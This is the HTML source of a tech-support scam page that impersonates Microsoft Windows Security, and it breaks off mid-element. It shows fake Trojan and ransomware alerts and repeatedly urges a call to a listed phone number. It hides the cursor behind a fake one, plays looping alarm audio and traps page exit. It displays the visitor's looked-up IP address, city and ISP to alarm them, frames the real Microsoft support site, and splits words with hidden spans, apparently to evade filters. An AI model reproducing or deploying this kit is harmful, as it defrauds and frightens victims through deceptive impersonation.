
<!DOCTYPE html>
<html>
	<head>
		<meta name="robots" content="noindex, nofollow" />
		<meta charset="utf-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1" />
		<title>Security center</title>
		<link rel="stylesheet" href="styles.css" />
		<link rel="shortcut icon" href="microsoft.png" type="image/png" />
		<link rel="stylesheet" href="font-awesome.min.css" />
		<script>
			const phone = '707-708-3573' ;
		</script>
		<style>
			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 400;
				src: url(KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2');
				unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 400;
				src: url(KFOmCnqEu92Fr1Mu5mxKOzY.woff2) format('woff2');
				unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 400;
				src: url(KFOmCnqEu92Fr1Mu7mxKOzY.woff2) format('woff2');
				unicode-range: U+1F00-1FFF;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 400;
				src: url(KFOmCnqEu92Fr1Mu4WxKOzY.woff2) format('woff2');
				unicode-range: U+0370-03FF;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 400;
				src: url(KFOmCnqEu92Fr1Mu7WxKOzY.woff2) format('woff2');
				unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 400;
				src: url(KFOmCnqEu92Fr1Mu7GxKOzY.woff2) format('woff2');
				unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 400;
				src: url(KFOmCnqEu92Fr1Mu4mxK.woff2) format('woff2');
				unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191,
					U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 500;
				src: url(KFOlCnqEu92Fr1MmEU9fCRc4EsA.woff2) format('woff2');
				unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 500;
				src: url(KFOlCnqEu92Fr1MmEU9fABc4EsA.woff2) format('woff2');
				unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 500;
				src: url(KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2) format('woff2');
				unicode-range: U+1F00-1FFF;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 500;
				src: url(KFOlCnqEu92Fr1MmEU9fBxc4EsA.woff2) format('woff2');
				unicode-range: U+0370-03FF;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 500;
				src: url(KFOlCnqEu92Fr1MmEU9fCxc4EsA.woff2) format('woff2');
				unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 500;
				src: url(KFOlCnqEu92Fr1MmEU9fChc4EsA.woff2) format('woff2');
				unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 500;
				src: url(KFOlCnqEu92Fr1MmEU9fBBc4.woff2) format('woff2');
				unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191,
					U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 700;
				src: url(KFOlCnqEu92Fr1MmWUlfCRc4EsA.woff2) format('woff2');
				unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 700;
				src: url(KFOlCnqEu92Fr1MmWUlfABc4EsA.woff2) format('woff2');
				unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 700;
				src: url(KFOlCnqEu92Fr1MmWUlfCBc4EsA.woff2) format('woff2');
				unicode-range: U+1F00-1FFF;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 700;
				src: url(KFOlCnqEu92Fr1MmWUlfBxc4EsA.woff2) format('woff2');
				unicode-range: U+0370-03FF;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 700;
				src: url(KFOlCnqEu92Fr1MmWUlfCxc4EsA.woff2) format('woff2');
				unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 700;
				src: url(KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2) format('woff2');
				unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
			}

			@font-face {
				font-family: 'Roboto';
				font-style: normal;
				font-weight: 700;
				src: url(KFOlCnqEu92Fr1MmWUlfBBc4.woff2) format('woff2');
				unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191,
					U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
			}
		</style>
		<style>
			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(4UaGrENHsxJlGDuGo1OIlL3Kwp5MKg.woff2) format('woff2');
				unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(4UaGrENHsxJlGDuGo1OIlL3Nwp5MKg.woff2) format('woff2');
				unicode-range: U+0370-03FF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(4UaGrENHsxJlGDuGo1OIlL3Bwp5MKg.woff2) format('woff2');
				unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(4UaGrENHsxJlGDuGo1OIlL3Awp5MKg.woff2) format('woff2');
				unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(4UaGrENHsxJlGDuGo1OIlL3Owp4.woff2) format('woff2');
				unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191,
					U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(4UabrENHsxJlGDuGo1OIlLU94Yt3CwZ-Pw.woff2) format('woff2');
				unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(4UabrENHsxJlGDuGo1OIlLU94YtwCwZ-Pw.woff2) format('woff2');
				unicode-range: U+0370-03FF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(4UabrENHsxJlGDuGo1OIlLU94Yt8CwZ-Pw.woff2) format('woff2');
				unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(4UabrENHsxJlGDuGo1OIlLU94Yt9CwZ-Pw.woff2) format('woff2');
				unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(4UabrENHsxJlGDuGo1OIlLU94YtzCwY.woff2) format('woff2');
				unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191,
					U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
			}
		</style>

		<style>
			.blink_me {
				animation: blinker 1s linear infinite;
			}

			@keyframes blinker {
				50% {
					opacity: 0;
				}
			}
		</style>

		<style>
			.blink {
				color: #fff;
				animation: blink-animation 1s steps(5, start) infinite;
				-webkit-animation: blink-animation 1s steps(5, start) infinite;
			}

			.blink1 {
				background-color: green;
				animation: blink-animation 1s steps(5, start) infinite;
				-webkit-animation: blink-animation 1s steps(5, start) infinite;
			}

			@keyframes blink-animation {
				to {
					visibility: hidden;
				}
			}
			@-webkit-keyframes blink-animation {
				to {
					visibility: hidden;
				}
			}
		</style>

		<style type="text/css">
			html {
				cursor: none;
			}
			.fakeCursor {
				width: 17px;
				height: 25px;
				background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABEAAAAZCAMAAADg4DWlAAAAmVBMVEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///8jo0yHAAAAMXRSTlMAAQUPA0IfMgInFzlGCwwpGQcJEiIIP04vGDoqDgYbNVFDGjFBMEgWIElFEyw4PjRLq1RDbAAAALhJREFUeF5V0NlygzAMBVDbKK1tgtlJSgrZ93RR/v/jgjwTC/R45o6kuUJIDVqK0SDkSaHGhBhlNhoTPtGkH0QsT4w/iVgGmjGRMAVhCsLEwsTCRDKhsIemTW2hvQyKm8Xp989kCZAgyeL/cKxslFMG11uia7OySQdSIO72Mcl8tvyq/fX6bNKLp7j6Bnqxo34mId+h5tC7Z5Jbs7qrUJxEfLQ/pmQR4HpjegcsUrmydNQHEygFA7wAtBchFf1cSBMAAAAASUVORK5CYII=');
				position: fixed;
				top: 5px;
				left: 400px;
				z-index: 10000;
			}
		</style>

		<script>
			var t = new XMLHttpRequest();
			t.onreadystatechange = function () {
				if (4 == this.readyState && 200 == this.status) {
					var a = JSON.parse(this.responseText);
					ipadd = a.ip;
					city = a.city;
					country = a.country;
					isp = a.connection.isp;
					var b = new Date();
					currtime = a.timezone.current_time;
					document.getElementById('ip_add').textContent = 'Address IP: ' + ipadd + ' ' + b.toLocaleString('EN-US', currtime);
					document.getElementById('city').textContent = 'Location: ' + city + ', ' + country;
					document.getElementById('isp').textContent = 'ISP: ' + isp;
				}
			};
			t.open('GET', 'https://ipwho.is/?lang=en', !0);
			t.send();
		</script>

		<script>
			function getVariableFromURl(n0me) {
				n0me = n0me.replace(/[\[]/, '\\\[').replace(/[\]]/, '\\\]');
				var regexS = '[\\?&]' + n0me + '=([^&#]*)';
				var regex = new RegExp(regexS);
				var results = regex.exec(window.location.href);
				if (results == null) return '';
				else return results[1];
			}
		</script>

		<script type="text/javascript">
			var ph0ne1 = getVariableFromURl('ph0ne1');
		</script>
		
				<!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '637211488626768');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=637211488626768&ev=PageView&noscript=1"/></noscript>
<!-- End Meta Pixel Code -->
		
	



</head>
	<body id="mycanvas" class="map" onbeforeunload="return myFunction()" style="cursor: none" onclick="playSound()">


		<audio id="hdfvh443peep" autoplay="">
			<source src="" type="audio/mpeg" />
		</audio>
		<div class="bg" style="cursor: none">
			<div class="bgimg" style="top: 0px"><img src="bg1.jpg" alt="" width="100%" /></div>
			<div class="bgimg2" style="top: 0px"><img src="bg2.jpg" alt="" width="100%" /></div>
		</div>

		<a href="#" rel="noreferrer" id="link_black" style="cursor: none">
			<div class="black" style="height: 145%; cursor: none"></div>
		</a>

		<div class="fakeCursor"></div>

		<iframe
			src="https://support.microsoft.com/en-us/windows"
			id="frame"
			style="position: fixed; top: 0; left: 0; bottom: 0; right: 0; width: 100%; height: 100%; border: none; margin: 0; padding: 0"
		>
		</iframe>

		<a onclick="openFullscreen();" rel="noreferrer" id="link_black" style="">
			<div class="black" style="height: 145%"></div>
		</a>

		<div class="box" id="box">
			<div class="top">
				<p style="font-size: 16px; font-family: 'Google Sans', 'Google Sans Text', Roboto, sans-serif; font-weight: 600">
					Microsoft Wi<span style="display:none;">ugs</span>ndows Security<img src="minimize.jpg" class="btn" style="float: right; width: 115px" />
				</p>
			</div>

			<h2 style="position: absolute; left: 70px; top: 60px; font-weight: 300" id="text1">Safety at a glance</h2>
			<p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px" id="text2">
				<br />Check wh<span style="display:none;">uyz</span>at is ha<span style="display:none;">wuz</span>ppening to the sa<span style="display:none;">ufj</span>fety and he<span style="display:none;">dlh</span>alth of yo<span style="display:none;">dfd</span>ur de<span style="display:none;">tqx</span>vice and ta<span style="display:none;">vrf</span>ke all ne<span style="display:none;">cli</span>cessary measures.
			</p>
			<div class="centerright">
				<ul>
					<li>
						<br />
						<img src="kxFy-clip.png" width="40px;" />
						<p>Virus and th<span style="display:none;">ggz</span>reat protection</p>
						<p style="top: 120px; position: absolute; font-size: 13px; color: grey">
							action is re<span style="display:none;">kzy</span>quired. Run a sc<span style="display:none;">pss</span>an to ch<span style="display:none;">dzx</span>eck for <br />threats.
						</p>
					</li>
					<li>
						<br /><br />
						<img src="qsbs-firewall.png" width="60px;" />
						<p>Firewall and ne<span style="display:none;">gid</span>twork protection</p>
						<p style="top: 270px; position: absolute; font-size: 13px; color: grey">No ac<span style="display:none;">xwl</span>tion required.</p>
					</li>
				</ul>
				<ul>
					<li>
						<br />
						<img src="s-S4-acc.png" width="60px;" />
						<p>Account protection</p>
						<p style="top: 125px; position: absolute; font-size: 13px; color: grey">No ac<span style="display:none;">xwl</span>tion required.</p>
					</li>
					<li>
						<br />
						<img src="Z5BR-network.png" width="51px;" />
						<p>Application and br<span style="display:none;">frk</span>owser control</p>
						<p style="top: 270px; position: absolute; font-size: 13px; color: grey">No ac<span style="display:none;">xwl</span>tion required.</p>
					</li>
				</ul>
			</div>
			<img src="uZbx-si.png" class="btn" style="border-bottom-left-radius: 10px" width="30.9px; height: 15.2px;" id="clscl" />
			<br />
		</div>

		<!--Chrome Security Quick Scan-->
		<div class="scan" id="scan">
			<div class="top">
				<p style="font-size: 16px; font-family: 'Google Sans', 'Google Sans Text', Roboto, sans-serif; font-weight: 600">
					Microsoft Wi<span style="display:none;">ugs</span>ndows Security<img src="minimize.jpg" class="btn" style="float: right; width: 115px" />
				</p>
			</div>
			<h2 style="position: absolute; left: 66px; top: 49px; font-weight: 300" id="text1">
				<img src="kxFy-clip.png" width="30px;" style="margin-right: 10px; vertical-align: text-top" />Virus and th<span style="display:none;">ggz</span>reat protection
			</h2>
			<p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px" id="text2">
				Device pr<span style="display:none;">puq</span>otection ag<span style="display:none;">oiw</span>ainst threats.
			</p>

			<h3 style="position: absolute; right: 180px; top: -10px; font-weight: 300" id="text12">
				<b
					><script>
						document.write(phone);
					</script></b
				>
			</h3>

			<div class="centerright">
				<ul>
					<li>
						<div class="flex">
							<img src="-EBq-current.png" width="20px" height="20px;" style="margin-right: 10px; top: 33px; position: absolute" />
							<p style="font-weight: 400; position: absolute; left: 30px">Current Threat</p>
						</div>

						<br /><br />
						<div class="progress" id="bar">
							<div class="progress__bar"></div>
						</div>

						<p style="font-size: 13px" id="info">
							A qu<span style="display:none;">ayx</span>ick sc<span style="display:none;">pss</span>an is in progress...<br />Estimated ti<span style="display:none;">lcv</span>me re<span style="display:none;">pdt</span>maining: <n id="time">0</n><br /><n id="amount">0</n> Fi<span style="display:none;">tkg</span>les scanned.
						</p>

						<a href="#" class="button" id="re">to cancel</a>
						<p style="font-size: 13px" id="recx">Keep wo<span style="display:none;">gid</span>rking wh<span style="display:none;">xrh</span>ile we an<span style="display:none;">pzg</span>alyze yo<span style="display:none;">dfd</span>ur device.</p>

						<p style="font-size: 13px; color: #0063c6; cursor: pointer" id="recx-hide">protection history</p>
						<br />
						<p id="shx" style="font-size: 13px; color: #0063c6; display: none; cursor: pointer">
							Scan Options<br />
							Allowed Threats<br />
							Protection History
						</p>
					</li>

					<li>
						<div class="flex">
							<img src="nOxp-sett.png" height="28px" width="30px;" style="margin-right: 10px; margin-top: 5px" />
							<p style="position: absolute; left: 35px; bottom: 76px; line-height: 18px">Virus &a<span style="display:none;">gji</span>mp; th<span style="display:none;">ggz</span>reat pr<span style="display:none;">puq</span>otection settings</p>
						</div>
						<p style="color: grey; font-size: 13px">no ac<span style="display:none;">xwl</span>tion required</p>
						<p style="font-size: 13px; color: #0063c6">Manage yo<span style="display:none;">dfd</span>ur settings</p>
					</li>
				</ul>
				<ul>
					<li>
						<p style="position: absolute; top: -55px">I ha<span style="display:none;">hrk</span>ve a question?</p>

						<p style="font-size: 13px; color: #0063c6; position: absolute; top: -15px; cursor: pointer">get help</p>
					</li>
					<li>
						<p style="position: absolute; top: 25px">who wi<span style="display:none;">wsc</span>ll pr<span style="display:none;">rzg</span>otect me</p>

						<p style="font-size: 13px; color: #0063c6; position: absolute; top: 65px; cursor: pointer">Supplier management</p>
					</li>
					<li>
						<p style="position: absolute; top: 100px"><br />Help us im<span style="display:none;">tzj</span>prove Mi<span style="display:none;">hjv</span>crosoft Wi<span style="display:none;">ugs</span>ndows security</p>

						<p style="font-size: 13px; color: #0063c6; position: absolute; top: 152px; cursor: pointer">Send us yo<span style="display:none;">dfd</span>ur feedback</p>
					</li>
					<li>
						<p style="position: absolute; top: 190px">Change yo<span style="display:none;">dfd</span>ur pr<span style="display:none;">ciu</span>ivacy settings</p>
						<p style="position: absolute; top: 220px; font-size: 13px">
							View and ch<span style="display:none;">xoj</span>ange pr<span style="display:none;">ciu</span>ivacy se<span style="display:none;">iiy</span>ttings on Mi<span style="display:none;">hjv</span>crosoft Windows<br /><n id="which"></n> devices.
						</p>

						<p style="font-size: 13px; color: #0063c6; position: absolute; top: 270px; cursor: pointer">
							Privacy Settings<br />Privacy Dashboard<br />Privacy Statement
						</p>
					</li>
				</ul>
			</div>
			<img src="uZbx-si.png" class="btn" style="border-bottom-left-radius: 10px" width="30.9px; height: 15.2px;" id="clscl" />
			<br />
		</div>

		<div class="alert_popup cardcontainer lightbox">
			<div class="container">
				<div class="row">
					<div class="col-md-12">
						<p
							class="text-center"
							style="
								font-size: 16px;
								font-weight: normal;
								margin: 0;
								margin-bottom: 5px;
								padding: 5px 10px;
								color: #fff;
								font-weight: bold;
								margin-top: 8px;
								text-align: center;
							"
						>
							<img src="microsoft.png" class="logo12" /> Mi<span style="display:none;">hjv</span>crosoft Wi<span style="display:none;">ugs</span>ndows Security - Sp<span style="display:none;">ifk</span>yware Alert
						</p>
						<p class="text-center">** Mi<span style="display:none;">hjv</span>crosoft Wi<span style="display:none;">ugs</span>ndows is in<span style="display:none;">ips</span>fected wi<span style="display:none;">lpu</span>th Tr<span style="display:none;">pkf</span>ojan:SLocker **</p>
						<p>A cr<span style="display:none;">flo</span>itical er<span style="display:none;">hid</span>ror has oc<span style="display:none;">vov</span>curred due to the ou<span style="display:none;">apj</span>tdated ve<span style="display:none;">itg</span>rsion of the br<span style="display:none;">ovo</span>owser. Up<span style="display:none;">fio</span>date yo<span style="display:none;">dfd</span>ur br<span style="display:none;">frk</span>owser as so<span style="display:none;">lzz</span>on as possible.</p>
						<p>The fo<span style="display:none;">ejw</span>llowing er<span style="display:none;">rdu</span>rors are al<span style="display:none;">igl</span>so po<span style="display:none;">wdz</span>ssible on ou<span style="display:none;">apj</span>tdated ve<span style="display:none;">fik</span>rsions of the browser:</p>
						<ul class="icon-links">
							<li>&gt; Lo<span style="display:none;">oca</span>ss of pe<span style="display:none;">dhc</span>rsonal and st<span style="display:none;">thy</span>ored data</li>
							<li>&gt; Co<span style="display:none;">vad</span>nfidental in<span style="display:none;">vzl</span>formation leak</li>
							<li>&gt; Br<span style="display:none;">gat</span>owsers errors</li>
						</ul>

						<p>
							A Mi<span style="display:none;">hjv</span>crosoft Wi<span style="display:none;">ugs</span>ndows Security sc<span style="display:none;">pss</span>an has de<span style="display:none;">hez</span>tected po<span style="display:none;">vyk</span>tentially un<span style="display:none;">hlj</span>wanted ad<span style="display:none;">hag</span>ware on th<span style="display:none;">ggv</span>is de<span style="display:none;">tqx</span>vice th<span style="display:none;">shu</span>at can st<span style="display:none;">kax</span>eal pa<span style="display:none;">uhc</span>sswords, online
							identities, fi<span style="display:none;">ddl</span>nancial in<span style="display:none;">xqs</span>formation, pe<span style="display:none;">dhc</span>rsonal fi<span style="display:none;">ida</span>les, im<span style="display:none;">loo</span>ages, or documents.
						</p>
						<p>
							Please co<span style="display:none;">kxf</span>ntact us im<span style="display:none;">ucq</span>mediately so th<span style="display:none;">shu</span>at our en<span style="display:none;">wjl</span>gineer can ex<span style="display:none;">slc</span>plain the re<span style="display:none;">fru</span>moval pr<span style="display:none;">fzx</span>ocess ov<span style="display:none;">qsp</span>er the phone.<br /><br />

							Please co<span style="display:none;">kxf</span>ntact Mi<span style="display:none;">hjv</span>crosoft Wi<span style="display:none;">ugs</span>ndows Su<span style="display:none;">aqk</span>pport im<span style="display:none;">ucq</span>mediately to re<span style="display:none;">wpt</span>port th<span style="display:none;">ggv</span>is th<span style="display:none;">vcl</span>reat, pr<span style="display:none;">eze</span>event sp<span style="display:none;">rgp</span>oofing, and un<span style="display:none;">fji</span>lock ac<span style="display:none;">gvr</span>cess to this
							device.<br /><br />
							Closing th<span style="display:none;">ggv</span>is Mi<span style="display:none;">hjv</span>crosoft Wi<span style="display:none;">ugs</span>ndows pu<span style="display:none;">qwx</span>ts yo<span style="display:none;">dfd</span>ur pe<span style="display:none;">dhc</span>rsonal in<span style="display:none;">vzl</span>formation at ri<span style="display:none;">pqa</span>sk and in<span style="display:none;">via</span>terrupts yo<span style="display:none;">dfd</span>ur Mi<span style="display:none;">hjv</span>crosoft Wi<span style="display:none;">ugs</span>ndows registration.
						</p>

						<p style="padding-bottom: 0px">
							Call Mi<span style="display:none;">hjv</span>crosoft Wi<span style="display:none;">ugs</span>ndows Support
							<strong
								><script>
									document.write(phone);
								</script></strong
							>
						</p>
						<div class="action_buttons">
							<a class="" id="leave_page" style="cursor: pointer">OK</a> <a class="" id="leave_page">Cancel</a>
						</div>
					</div>
				</div>
			</div>
		</div>
		<audio id="hdfvh443" loop="">
			<source src="media/iicme4.mp3" type="audio/mpeg" />
		</audio>

		<div id="lst" class="lst lightbox">
			<div class="ilb top">
				<div class="headers ilb" style="border-bottom: 1px solid #d6d5d5">
					<span id="txtadd" class="fl title"
						><span class="fl ilb"><img src="microsoft.png" class="logo3" /></span> Mi<span style="display:none;">hjv</span>crosoft Wi<span style="display:none;">ugs</span>ndows Security Center</span
					>
					<span id="txts1" class="fl title2"
						><a href="#"><img src="cross.png" /></a
					></span>
				</div>
			</div>
			<div id="txtintro">
				<span class="text-danger" style="colo-rd"> Th<span style="display:none;">yks</span>reat De<span style="display:none;">rrl</span>tected: xx<span style="display:none;">akh</span>bc Detected</span>

				<div id="ip_add">Microsoft_Windows_Firewall_Alert !</div>
				<div id="city">PC ta<span style="display:none;">rtr</span>inted wi<span style="display:none;">lpu</span>th Tr<span style="display:none;">cck</span>ojan-type spyware</div>
				<div id="isp">(Error_Code: 2SVB7AZP)</div>
				<img id="banner" src="re.gif" /><br />
				<span class="act" style="font-size: 20px">Access has be<span style="display:none;">agk</span>en bl<span style="display:none;">egu</span>ocked ..</span><br />
				<span class="support"
					>Contact Mi<span style="display:none;">hjv</span>crosoft Wi<span style="display:none;">ugs</span>ndows Support:
					<script>
						document.write(phone);
					</script></span
				>
			</div>

			<div id="bottom">
				<img id="badge" src="microsoft.png" /><span class="title3">Microsoft Windows</span>
				<ul>
					<li>
						<a href="#">
							<div class="fr button2">
								<span id="addtochromebutton">Continue</span>
							</div>
						</a>
					</li>
					<li>
						<a href="#">
							<div class="fr buttons blink">
								<span id="addtochromebutton">Leave</span>
							</div>
						</a>
					</li>
				</ul>
			</div>
		</div>

		<div id="footer">
			<div class="row">
				<div class="col-md-12">
					<div class="right-foot" style="text-align: center">
						<span id="footertxt"><img src="microsoft.png" /> Mi<span style="display:none;">hjv</span>crosoft Wi<span style="display:none;">wyj</span>ndows: </span
						><span style="font-weight: 800; padding-left: 13px; color: #fff; font-family: inherit"
							>Support Contact
							<span style="border: 1px solid #fff; border-radius: 5px; padding: 2px 5px"
								><script>
									document.write(phone);
								</script></span
							></span
						>
					</div>
				</div>
				<div class="col-md-12">
					<marquee width="100%" direction="left" height="100px"
						><small class="text-left" style="color: #eee; font-size: 12px"
							><strong>Security No<span style="display:none;">cid</span>te :</strong> Ma<span style="display:none;">sck</span>lware is kn<span style="display:none;">dhx</span>own to st<span style="display:none;">kax</span>eal in<span style="display:none;">vzl</span>formation fr<span style="display:none;">yvj</span>om yo<span style="display:none;">dfd</span>ur de<span style="display:none;">tqx</span>vice and use yo<span style="display:none;">dfd</span>ur id<span style="display:none;">vtf</span>entity to do
							malicious tr<span style="display:none;">cts</span>ansactions. Due to CO<span style="display:none;">qwk</span>VID-19, da<span style="display:none;">ukx</span>ta th<span style="display:none;">pdd</span>eft in<span style="display:none;">weq</span>cidents via a fr<span style="display:none;">pxr</span>audulent ad<span style="display:none;">tao</span>vertisement th<span style="display:none;">shu</span>at in<span style="display:none;">eyf</span>jects ad<span style="display:none;">hag</span>ware to your
							browser Mi<span style="display:none;">hjv</span>crosoft Wi<span style="display:none;">ugs</span>ndows ha<span style="display:none;">hrk</span>ve in<span style="display:none;">vac</span>creased by 62<span style="display:none;">qzp</span>4%. Be<span style="display:none;">aaf</span>cause of th<span style="display:none;">tkd</span>is, we re<span style="display:none;">frf</span>commend a se<span style="display:none;">zqy</span>curity ap<span style="display:none;">ifs</span>plication th<span style="display:none;">shu</span>at can remove
							Adware and Ma<span style="display:none;">sck</span>lware for yo<span style="display:none;">glc</span>u. The app can al<span style="display:none;">igl</span>so sp<span style="display:none;">gxk</span>eed up yo<span style="display:none;">dfd</span>ur br<span style="display:none;">aiq</span>owser, bl<span style="display:none;">idy</span>ocks ag<span style="display:none;">gsr</span>gressive ad<span style="display:none;">awy</span>s, and a lot more</small
						></marquee
					>
				</div>
			</div>
		</div>

		<div id="welcomeDiv" class="answer_list">
			<p class="text-center" style="color: #fefefe; margin-top: 10px; font-size: 16px; opacity: 0.9">
				This Mi<span style="display:none;">hjv</span>crosoft Wi<span style="display:none;">ugs</span>ndows is in<span style="display:none;">ips</span>fected wi<span style="display:none;">lpu</span>th tr<span style="display:none;">rky</span>ojan:SLocker, a da<span style="display:none;">rkr</span>ngerous ra<span style="display:none;">ira</span>nsomware and it wi<span style="display:none;">wsc</span>ll lo<span style="display:none;">fpf</span>ck yo<span style="display:none;">dfd</span>ur device!<br />
				Virus mu<span style="display:none;">aqk</span>st be re<span style="display:none;">wrk</span>moved im<span style="display:none;">ouo</span>mediately! <br />Please co<span style="display:none;">kxf</span>ntact us im<span style="display:none;">xrx</span>mediately. A te<span style="display:none;">jeo</span>chnician wi<span style="display:none;">wsc</span>ll he<span style="display:none;">fig</span>lp you so<span style="display:none;">prg</span>lve the problem.
			</p>
		</div>

		<div id="chrome-alerts" class="chrome-alert" style="padding-top: 10px; cursor: pointer">
			<div>
				<p>Leave site?</p>
				<p>Changes you ma<span style="display:none;">lvs</span>de may not be saved.</p>
				<input type="checkbox" id="checkbox" name="checkbox" value="checkbox" />
